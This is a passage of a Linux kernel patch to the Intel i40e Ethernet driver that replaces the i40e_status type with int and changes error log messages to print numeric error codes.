+ int i40e_vsi_add_pvid(struct i40e_vsi *vsi, u16 vid)
+ {
+ 	struct i40e_vsi_context ctxt;
+-	i40e_status ret;
++	int ret;
+ 
+ 	vsi->info.valid_sections = cpu_to_le16(I40E_AQ_VSI_PROP_VLAN_VALID);
+ 	vsi->info.pvid = cpu_to_le16(vid);
+@@ -3265,8 +3265,8 @@ int i40e_vsi_add_pvid(struct i40e_vsi *vsi, u16 vid)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "add pvid failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&vsi->back->hw, ret),
++			 "add pvid failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -3429,8 +3429,8 @@ static int i40e_configure_tx_ring(struct i40e_ring *ring)
+ 	u16 pf_q = vsi->base_queue + ring->queue_index;
+ 	struct i40e_hw *hw = &vsi->back->hw;
+ 	struct i40e_hmc_obj_txq tx_ctx;
+-	i40e_status err = 0;
+ 	u32 qtx_ctl = 0;
++	int err = 0;
+ 
+ 	if (ring_is_xdp(ring))
+ 		ring->xsk_pool = i40e_xsk_pool(ring);
+@@ -3554,7 +3554,7 @@ static int i40e_configure_rx_ring(struct i40e_ring *ring)
+ 	u16 pf_q = vsi->base_queue + ring->queue_index;
+ 	struct i40e_hw *hw = &vsi->back->hw;
+ 	struct i40e_hmc_obj_rxq rx_ctx;
+-	i40e_status err = 0;
++	int err = 0;
+ 	bool ok;
+ 	int ret;
+ 
+@@ -5524,16 +5524,16 @@ static int i40e_vsi_get_bw_info(struct i40e_vsi *vsi)
+ 	struct i40e_aqc_query_vsi_bw_config_resp bw_config = {0};
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
+ 	u32 tc_bw_max;
++	int ret;
+ 	int i;
+ 
+ 	/* Get the VSI level BW configuration */
+ 	ret = i40e_aq_query_vsi_bw_config(hw, vsi->seid, &bw_config, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi bw config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi bw config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -5543,8 +5543,8 @@ static int i40e_vsi_get_bw_info(struct i40e_vsi *vsi)
+ 					       NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi ets bw config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi ets bw config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -5585,7 +5585,7 @@ static int i40e_vsi_configure_bw_alloc(struct i40e_vsi *vsi, u8 enabled_tc,
+ {
+ 	struct i40e_aqc_configure_vsi_tc_bw_data bw_data;
+ 	struct i40e_pf *pf = vsi->back;
+-	i40e_status ret;
++	int ret;
+ 	int i;
+ 
+ 	/* There is no need to reset BW when mqprio mode is on.  */
+@@ -5733,8 +5733,8 @@ int i40e_update_adq_vsi_queues(struct i40e_vsi *vsi, int vsi_offset)
+ 
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "Update vsi config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++		dev_info(&pf->pdev->dev, "Update vsi config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -5789,8 +5789,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 						  &bw_config, NULL);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Failed querying vsi bw info, err %s aq_err %s\n",
+-				 i40e_stat_str(hw, ret),
++				 "Failed querying vsi bw info, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			goto out;
+ 		}
+@@ -5856,8 +5856,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Update vsi tc config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Update vsi tc config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -5869,8 +5869,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 	ret = i40e_vsi_get_bw_info(vsi);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed updating vsi bw info, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Failed updating vsi bw info, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -5961,8 +5961,8 @@ int i40e_set_bw_limit(struct i40e_vsi *vsi, u16 seid, u64 max_tx_rate)
+ 					  I40E_MAX_BW_INACTIVE_ACCUM, NULL);
+ 	if (ret)
+ 		dev_err(&pf->pdev->dev,
+-			"Failed set tx rate (%llu Mbps) for vsi->seid %u, err %s aq_err %s\n",
+-			max_tx_rate, seid, i40e_stat_str(&pf->hw, ret),
++			"Failed set tx rate (%llu Mbps) for vsi->seid %u, err %d aq_err %s\n",
++			max_tx_rate, seid, ret,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	return ret;
+ }
+@@ -6037,8 +6037,8 @@ static void i40e_remove_queue_channels(struct i40e_vsi *vsi)
+ 			last_aq_status = pf->hw.aq.asq_last_status;
+ 			if (ret)
+ 				dev_info(&pf->pdev->dev,
+-					 "Failed to delete cloud filter, err %s aq_err %s\n",
+-					 i40e_stat_str(&pf->hw, ret),
++					 "Failed to delete cloud filter, err %d aq_err %s\n",
++					 ret,
+ 					 i40e_aq_str(&pf->hw, last_aq_status));
+ 			kfree(cfilter);
+ 		}
+@@ -6172,8 +6172,8 @@ static int i40e_vsi_reconfig_rss(struct i40e_vsi *vsi, u16 rss_size)
+ 	ret = i40e_config_rss(vsi, seed, lut, vsi->rss_table_size);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot set RSS lut, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Cannot set RSS lut, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		kfree(lut);
+ 		return ret;
+@@ -6271,8 +6271,8 @@ static int i40e_add_channel(struct i40e_pf *pf, u16 uplink_seid,
+ 	ret = i40e_aq_add_vsi(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "add new vsi failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "add new vsi failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw,
+ 				     pf->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -6303,7 +6303,7 @@ static int i40e_channel_config_bw(struct i40e_vsi *vsi, struct i40e_channel *ch,
+ 				  u8 *bw_share)
+ {
+ 	struct i40e_aqc_configure_vsi_tc_bw_data bw_data;
+-	i40e_status ret;
++	int ret;
+ 	int i;
+ 
+ 	memset(&bw_data, 0, sizeof(bw_data));
+@@ -6339,9 +6339,9 @@ static int i40e_channel_config_tx_ring(struct i40e_pf *pf,
+ 				       struct i40e_vsi *vsi,
+ 				       struct i40e_channel *ch)
+ {
+-	i40e_status ret;
+-	int i;
+ 	u8 bw_share[I40E_MAX_TRAFFIC_CLASS] = {0};
++	int ret;
++	int i;
+ 
+ 	/* Enable ETS TCs with equal BW Share for now across all VSIs */
+ 	for (i = 0; i < I40E_MAX_TRAFFIC_CLASS; i++) {
+@@ -6517,8 +6517,8 @@ static int i40e_validate_and_set_switch_mode(struct i40e_vsi *vsi)
+ 					mode, NULL);
+ 	if (ret && hw->aq.asq_last_status != I40E_AQ_RC_ESRCH)
+ 		dev_err(&pf->pdev->dev,
+-			"couldn't set switch config bits, err %s aq_err %s\n",
+-			i40e_stat_str(hw, ret),
++			"couldn't set switch config bits, err %d aq_err %s\n",
++			ret,
+ 			i40e_aq_str(hw,
+ 				    hw->aq.asq_last_status));
+ 
+@@ -6718,8 +6718,8 @@ int i40e_veb_config_tc(struct i40e_veb *veb, u8 enabled_tc)
+ 						   &bw_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "VEB bw config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "VEB bw config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -6728,8 +6728,8 @@ int i40e_veb_config_tc(struct i40e_veb *veb, u8 enabled_tc)
+ 	ret = i40e_veb_get_bw_info(veb);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed getting veb bw config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed getting veb bw config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ 
+@@ -6812,8 +6812,8 @@ static int i40e_resume_port_tx(struct i40e_pf *pf)
+ 	ret = i40e_aq_resume_port_tx(hw, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Resume Port Tx failed, err %s aq_err %s\n",
+-			  i40e_stat_str(&pf->hw, ret),
++			 "Resume Port Tx failed, err %d aq_err %s\n",
++			  ret,
+ 			  i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* Schedule PF reset to recover */
+ 		set_bit(__I40E_PF_RESET_REQUESTED, pf->state);
+@@ -6837,8 +6837,8 @@ static int i40e_suspend_port_tx(struct i40e_pf *pf)
+ 	ret = i40e_aq_suspend_port_tx(hw, pf->mac_seid, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Suspend Port Tx failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Suspend Port Tx failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* Schedule PF reset to recover */
+ 		set_bit(__I40E_PF_RESET_REQUESTED, pf->state);
+@@ -6877,8 +6877,8 @@ static int i40e_hw_set_dcb_config(struct i40e_pf *pf,
+ 	ret = i40e_set_dcb_config(&pf->hw);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Set DCB Config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Set DCB Config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -6994,8 +6994,8 @@ int i40e_hw_dcb_config(struct i40e_pf *pf, struct i40e_dcbx_config *new_cfg)
+ 		 i40e_aqc_opc_modify_switching_comp_ets, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Modify Port ETS failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Modify Port ETS failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -7032,8 +7032,8 @@ int i40e_hw_dcb_config(struct i40e_pf *pf, struct i40e_dcbx_config *new_cfg)
+ 	ret = i40e_aq_dcb_updated(&pf->hw, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "DCB Updated failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "DCB Updated failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -7116,8 +7116,8 @@ int i40e_dcb_sw_default_config(struct i40e_pf *pf)
+ 		 i40e_aqc_opc_enable_switching_comp_ets, NULL);
+ 	if (err) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Enable Port ETS failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++			 "Enable Port ETS failed, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		err = -ENOENT;
+ 		goto out;
+@@ -7196,8 +7196,8 @@ static int i40e_init_pf_dcb(struct i40e_pf *pf)
+ 		pf->flags |= I40E_FLAG_DISABLE_FW_LLDP;
+ 	} else {
+ 		dev_info(&pf->pdev->dev,
+-			 "Query for DCB configuration failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++			 "Query for DCB configuration failed, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ 
+@@ -7415,15 +7415,15 @@ static void i40e_vsi_reinit_locked(struct i40e_vsi *vsi)
+  * @pf: board private structure
+  * @is_up: whether the link state should be forced up or down
+  **/
+-static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
++static int i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ {
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ 	struct i40e_aq_set_phy_config config = {0};
+ 	bool non_zero_phy_type = is_up;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status err;
+ 	u64 mask;
+ 	u8 speed;
++	int err;
+ 
+ 	/* Card might've been put in an unstable state by other drivers
+ 	 * and applications, which causes incorrect speed values being
+@@ -7435,8 +7435,8 @@ static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 					   NULL);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"failed to get phy cap., ret =  %s last_status =  %s\n",
+-			i40e_stat_str(hw, err),
++			"failed to get phy cap., ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7447,8 +7447,8 @@ static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 					   NULL);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"failed to get phy cap., ret =  %s last_status =  %s\n",
+-			i40e_stat_str(hw, err),
++			"failed to get phy cap., ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7492,8 +7492,8 @@ static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"set phy config ret =  %s last_status =  %s\n",
+-			i40e_stat_str(&pf->hw, err),
++			"set phy config ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7656,11 +7656,11 @@ static void i40e_vsi_set_default_tc_config(struct i40e_vsi *vsi)
+  * This function deletes a mac filter on the channel VSI which serves as the
+  * macvlan. Returns 0 on success.
+  **/
+-static i40e_status i40e_del_macvlan_filter(struct i40e_hw *hw, u16 seid,
+-					   const u8 *macaddr, int *aq_err)
++static int i40e_del_macvlan_filter(struct i40e_hw *hw, u16 seid,
++				   const u8 *macaddr, int *aq_err)
+ {
+ 	struct i40e_aqc_remove_macvlan_element_data element;
+-	i40e_status status;
++	int status;
+ 
+ 	memset(&element, 0, sizeof(element));
+ 	ether_addr_copy(element.mac_addr, macaddr);
+@@ -7682,12 +7682,12 @@ static i40e_status i40e_del_macvlan_filter(struct i40e_hw *hw, u16 seid,
+  * This function adds a mac filter on the channel VSI which serves as the
+  * macvlan. Returns 0 on success.
+  **/
+-static i40e_status i40e_add_macvlan_filter(struct i40e_hw *hw, u16 seid,
+-					   const u8 *macaddr, int *aq_err)
++static int i40e_add_macvlan_filter(struct i40e_hw *hw, u16 seid,
++				   const u8 *macaddr, int *aq_err)
+ {
+ 	struct i40e_aqc_add_macvlan_element_data element;
+-	i40e_status status;
+ 	u16 cmd_flags = 0;
++	int status;
+ 
+ 	ether_addr_copy(element.mac_addr, macaddr);
+ 	element.vlan_tag = 0;
+@@ -7833,8 +7833,8 @@ static int i40e_fwd_ring_up(struct i40e_vsi *vsi, struct net_device *vdev,
+ 			rx_ring->netdev = NULL;
+ 		}
+ 		dev_info(&pf->pdev->dev,
+-			 "Error adding mac filter on macvlan err %s, aq_err %s\n",
+-			  i40e_stat_str(hw, ret),
++			 "Error adding mac filter on macvlan err %d, aq_err %s\n",
++			  ret,
+ 			  i40e_aq_str(hw, aq_err));
+ 		netdev_err(vdev, "L2fwd offload disabled to L2 filter error\n");
+ 	}
+@@ -7906,8 +7906,8 @@ static int i40e_setup_macvlans(struct i40e_vsi *vsi, u16 macvlan_cnt, u16 qcnt,
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Update vsi tc config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Update vsi tc config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -8122,8 +8122,8 @@ static void i40e_fwd_del(struct net_device *netdev, void *vdev)
+ 				ch->fwd = NULL;
+ 			} else {
+ 				dev_info(&pf->pdev->dev,
+-					 "Error deleting mac filter on macvlan err %s, aq_err %s\n",
+-					  i40e_stat_str(hw, ret),
++					 "Error deleting mac filter on macvlan err %d, aq_err %s\n",
++					  ret,
+ 					  i40e_aq_str(hw, aq_err));
+ 			}
+ 			break;
+@@ -8874,8 +8874,7 @@ static int i40e_delete_clsflower(struct i40e_vsi *vsi,
+ 	kfree(filter);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"Failed to delete cloud filter, err %s\n",
+-			i40e_stat_str(&pf->hw, err));
++			"Failed to delete cloud filter, err %d\n", err);
+ 		return i40e_aq_rc_to_posix(err, pf->hw.aq.asq_last_status);
+ 	}
+ 
+@@ -9437,8 +9436,8 @@ static int i40e_handle_lldp_event(struct i40e_pf *pf,
+ 			pf->flags &= ~I40E_FLAG_DCB_CAPABLE;
+ 		} else {
+ 			dev_info(&pf->pdev->dev,
+-				 "Failed querying DCB configuration data from firmware, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "Failed querying DCB configuration data from firmware, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 		}
+@@ -9886,8 +9885,8 @@ static void i40e_link_event(struct i40e_pf *pf)
+ {
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	u8 new_link_speed, old_link_speed;
+-	i40e_status status;
+ 	bool new_link, old_link;
++	int status;
+ #ifdef CONFIG_I40E_DCB
+ 	int err;
+ #endif /* CONFIG_I40E_DCB */
+@@ -10098,9 +10097,9 @@ static void i40e_clean_adminq_subtask(struct i40e_pf *pf)
+ 	struct i40e_arq_event_info event;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	u16 pending, i = 0;
+-	i40e_status ret;
+ 	u16 opcode;
+ 	u32 oldval;
++	int ret;
+ 	u32 val;
+ 
+ 	/* Do not run clean AQ when PF reset fails */
+@@ -10264,8 +10263,8 @@ static void i40e_enable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_get_vsi_params(&pf->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return;
+ 	}
+@@ -10276,8 +10275,8 @@ static void i40e_enable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "update vsi switch failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "update vsi switch failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ }
+@@ -10300,8 +10299,8 @@ static void i40e_disable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_get_vsi_params(&pf->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return;
+ 	}
+@@ -10312,8 +10311,8 @@ static void i40e_disable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "update vsi switch failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "update vsi switch failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ }
+@@ -10457,8 +10456,8 @@ static int i40e_get_capabilities(struct i40e_pf *pf,
+ 			buf_len = data_size;
+ 		} else if (pf->hw.aq.asq_last_status != I40E_AQ_RC_OK || err) {
+ 			dev_info(&pf->pdev->dev,
+-				 "capability discovery failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, err),
++				 "capability discovery failed, err %d aq_err %s\n",
++				 err,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return -ENODEV;
+@@ -10579,7 +10578,7 @@ static int i40e_rebuild_cloud_filters(struct i40e_vsi *vsi, u16 seid)
+ 	struct i40e_cloud_filter *cfilter;
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct hlist_node *node;
+-	i40e_status ret;
++	int ret;
+ 
+ 	/* Add cloud filters back if they exist */
+ 	hlist_for_each_entry_safe(cfilter, node, &pf->cloud_filter_list,
+@@ -10595,8 +10594,8 @@ static int i40e_rebuild_cloud_filters(struct i40e_vsi *vsi, u16 seid)
+ 
+ 		if (ret) {
+ 			dev_dbg(&pf->pdev->dev,
+-				"Failed to rebuild cloud filter, err %s aq_err %s\n",
+-				i40e_stat_str(&pf->hw, ret),
++				"Failed to rebuild cloud filter, err %d aq_err %s\n",
++				ret,
+ 				i40e_aq_str(&pf->hw,
+ 					    pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -10614,7 +10613,7 @@ static int i40e_rebuild_cloud_filters(struct i40e_vsi *vsi, u16 seid)
+ static int i40e_rebuild_channels(struct i40e_vsi *vsi)
+ {
+ 	struct i40e_channel *ch, *ch_tmp;
+-	i40e_status ret;
++	int ret;
+ 
+ 	if (list_empty(&vsi->ch_list))
+ 		return 0;
+@@ -10690,7 +10689,7 @@ static void i40e_clean_xps_state(struct i40e_vsi *vsi)
+ static void i40e_prep_for_reset(struct i40e_pf *pf)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	u32 v;
+ 
+ 	clear_bit(__I40E_RESET_INTR_RECEIVED, pf->state);
+@@ -10795,7 +10794,7 @@ static void i40e_get_oem_version(struct i40e_hw *hw)
+ static int i40e_reset(struct i40e_pf *pf)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
++	int ret;
+ 
+ 	ret = i40e_pf_reset(hw);
+ 	if (ret) {
+@@ -10820,7 +10819,7 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	const bool is_recovery_mode_reported = i40e_check_recovery_mode(pf);
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
++	int ret;
+ 	u32 val;
+ 	int v;
+ 
+@@ -10836,8 +10835,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	/* rebuild the basics for the AdminQ, HMC, and initial HW switch */
+ 	ret = i40e_init_adminq(&pf->hw);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "Rebuild AdminQ failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++		dev_info(&pf->pdev->dev, "Rebuild AdminQ failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto clear_recovery;
+ 	}
+@@ -10948,8 +10947,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 					 I40E_AQ_EVENT_MEDIA_NA |
+ 					 I40E_AQ_EVENT_MODULE_QUAL_FAIL), NULL);
+ 	if (ret)
+-		dev_info(&pf->pdev->dev, "set phy mask fail, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++		dev_info(&pf->pdev->dev, "set phy mask fail, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* Rebuild the VSIs and VEBs that existed before reset.
+@@ -11052,8 +11051,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 		msleep(75);
+ 		ret = i40e_aq_set_link_restart_an(&pf->hw, true, NULL);
+ 		if (ret)
+-			dev_info(&pf->pdev->dev, "link restart failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++			dev_info(&pf->pdev->dev, "link restart failed, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+@@ -11084,9 +11083,9 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	ret = i40e_set_promiscuous(pf, pf->cur_promisc);
+ 	if (ret)
+ 		dev_warn(&pf->pdev->dev,
+-			 "Failed to restore promiscuous setting: %s, err %s aq_err %s\n",
++			 "Failed to restore promiscuous setting: %s, err %d aq_err %s\n",
+ 			 pf->cur_promisc ? "on" : "off",
+-			 i40e_stat_str(&pf->hw, ret),
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	i40e_reset_all_vfs(pf, true);
+@@ -12220,8 +12219,8 @@ static int i40e_get_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 			(struct i40e_aqc_get_set_rss_key_data *)seed);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot get RSS key, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "Cannot get RSS key, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -12234,8 +12233,8 @@ static int i40e_get_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_get_rss_lut(hw, vsi->id, pf_lut, lut, lut_size);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot get RSS lut, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "Cannot get RSS lut, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -12510,11 +12509,11 @@ int i40e_reconfig_rss_queues(struct i40e_pf *pf, int queue_count)
+  * i40e_get_partition_bw_setting - Retrieve BW settings for this PF partition
+  * @pf: board private structure
+  **/
+-i40e_status i40e_get_partition_bw_setting(struct i40e_pf *pf)
++int i40e_get_partition_bw_setting(struct i40e_pf *pf)
+ {
+-	i40e_status status;
+ 	bool min_valid, max_valid;
+ 	u32 max_bw, min_bw;
++	int status;
+ 
+ 	status = i40e_read_bw_from_alt_ram(&pf->hw, &max_bw, &min_bw,
+ 					   &min_valid, &max_valid);
+@@ -12533,10 +12532,10 @@ i40e_status i40e_get_partition_bw_setting(struct i40e_pf *pf)
+  * i40e_set_partition_bw_setting - Set BW settings for this PF partition
+  * @pf: board private structure
+  **/
+-i40e_status i40e_set_partition_bw_setting(struct i40e_pf *pf)
++int i40e_set_partition_bw_setting(struct i40e_pf *pf)
+ {
+ 	struct i40e_aqc_configure_partition_bw_data bw_data;
+-	i40e_status status;
++	int status;
+ 
+ 	memset(&bw_data, 0, sizeof(bw_data));
+ 
+@@ -12555,12 +12554,12 @@ i40e_status i40e_set_partition_bw_setting(struct i40e_pf *pf)
+  * i40e_commit_partition_bw_setting - Commit BW settings for this PF partition
+  * @pf: board private structure
+  **/
+-i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
++int i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ {
